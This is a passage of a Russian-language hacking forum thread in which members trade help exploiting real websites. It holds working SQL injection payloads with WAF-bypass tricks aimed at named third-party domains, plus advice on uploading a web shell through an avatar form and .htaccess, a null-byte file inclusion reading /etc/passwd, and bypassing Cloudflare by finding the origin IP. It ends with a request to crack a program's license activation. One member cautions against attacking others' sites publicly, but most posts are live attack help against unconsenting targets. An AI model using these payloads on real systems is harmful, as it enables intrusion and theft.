Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос
    Code:
    id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
    и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
    В конце концов выйдет так:
    Code:
    24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
    Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
     
    erbolg, DezMond™, crlf and 2 others like this.
  2. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Надо же, как всё тривиально! И как же я сам до этого не додумался! Спасибо огромное за ответ! :)
     
  3. 3nvY

    3nvY Elder - Старейшина

    Joined:
    8 Jun 2015
    Messages:
    51
    Likes Received:
    21
    Reputations:
    11
    Доброго времени суток. Столкнулся с проблемой при загрузке шелла.
    На сайте есть функция загрузки аватарки, в запросе можно подменить расширение файла на какое угодно. Файл успешно грузится на сервак, но при переходе по ссылке он открывается как пикча (как ссылка внутри тега img), какое бы расширение я не выбрал. В ответе сервер возвращает content type image/jpeg (или тот, биты которого я подставляю в пэйлоад). Подмена mime type в реквесте на отличное от gif/png/jpeg не дает залить файл.

    Как можно запустить код эксплойта?

    Сервер: nginx
     
    #2923 3nvY, 27 Mar 2021
    Last edited: 27 Mar 2021
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Попробуй залить .htaccess с разрешение на пхп
     
  5. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT

    Code:
    www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
    PS

    waf обошел,

    Code:
    http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
    но не могу спровоцировать вывод уязвимых полей
     
    #2925 Samozvanec, 30 Mar 2021
    Last edited: 30 Mar 2021
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Всем привет!

    Code:
    $page = isset($_GET['lang']) ? $_GET['lang'] : 'default';
    if (! is_file('./language/'.$page.'/language.php')) {
        $page = 'default';
    }
    require_once './language/default/language.php';
    if ('default' != $page) {
        include_once './language/'.$page.'/language.php';
    }
    Php version 5.3.6

    Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
     
    _________________________
  8. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Error-Based например:
    Code:
    http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-
    Code:
    XPATH syntax error: ':5.5.65-MariaDB'
    Agent Code Is Invalid
     
    erbolg, eminlayer7788, crlf and 3 others like this.
  9. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Спасибо за ответ!
    Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало

    Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то
     
  10. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1

    Огромное спасибо!
     
  11. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Фикс был внутри версии 5.3.3, в 5.3.3.7 еще работал, в 5.3.3.8 уже нет.
     
  12. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Всё в порядке. Тема как раз создавалась для подобных однотипных вопросов, а ваше упорство в попытках постигнуть истинную суть инъекций заслуживает похвалы. Текущее поколение кулхацкеров, скульмаперов и метасплоитеров, тоска жуткая :)

    Иногда полезно какое-то время уделить разработке. С оптытом, придёт понимание абстрактных внутренних процессов и можно будет с большой вероятностью предположить, в какой части логики находится уязвимость и какого рода она может быть. Сходу, смею вангануть, что инъекция находится в запросе выборки категории, по ID которой в дальнейшем будут выбираться позиции для листинга. Следовательно, если нет вывода ошибок, с большой вероятностью можем предположить лишь булевой вариант. Простейшим выходом в данном случае, будет считывание текущего запроса из INFORMATION_SCHEMA.PROCESSLIST вслепую, чтоб точно подтверить/опровергнуть теорию.

    На правах старорега, хотелось бы добавить, что лично я, вообще не поддерживаю раскрутки подобных уязвимостей на чужих площадках публично, дебилов в наше время хватает, поверьте. Но дело каждого, на свой страх и риск как говорится. По поводу же РУ/СНГ ресурсов, вообще есть негласное правило, что их следует стараться обходить стороной, по многим причинам, которые заслуживают отдельного обсуждения, а скорее всего холивара :) Поэтому, настоятельно рекомедую переварить и принять к сведению полученную информацию. Чтоб закрыть вопрос с этим кейсом, взглянул одним глазком, имеет место неопределённое поведение, но инъекции нет.
     
    #2932 crlf, 8 Apr 2021
    Last edited: 8 Apr 2021
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите ваф обойти, фильтрует юнион селект
    Code:
    http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+uion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
     
  14. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
     
    sepo, fandor9, Samozvanec and 4 others like this.
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Не пойму вафа нету, скуля слепая, но скулмап не раскручивает( в чем трабла?
    Code:
    https://www.akbw.de/nc/veranstaltungen/veranstaltungskalender-architekturtreff.html?no_cache=1&tx_fufevents_pi1%5Bsearch%5D%5Borganizer%5D=35110
     
    #2935 DezMond™, 29 May 2021
    Last edited: 29 May 2021
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите ваф обойти, фильтрует и юнион и селект
    Code:
    https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+
     
  17. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    914+||+(select mid(@@version,1,1)=5)+--+-
     
    scooter, dmax0fw, K800 and 6 others like this.
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Тут надо клоуд обходить, смотрим ип через DNS history:
    ____viewdns.info/iphistory/?domain=baslerhofmann.ch
    Там будет такая запись:
    Далее просто направляем скульмап и радуемся жизни:

    Итого, что мы имеем:
     
    _________________________
  19. Qweasdzxc1

    Qweasdzxc1 New Member

    Joined:
    23 Sep 2019
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
  20. ura122

    ura122 Banned

    Joined:
    14 May 2020
    Messages:
    13
    Likes Received:
    5
    Reputations:
    0
    Здравствуйте, есть шахматная программа, которая требует онлайн-активации. Выяснил, что при вводе 25-значного ключа в программу, активация проходит с помощью проверки данного ключа вот по этому адресу: http://chess-cheat.com/test.php . При каждом обновлении данной страницы в браузере генерируется MD5 хеш 6-ти значных чисел и еще какие-то случайные цифры. Есть ли какие-то мысли об уязвимости?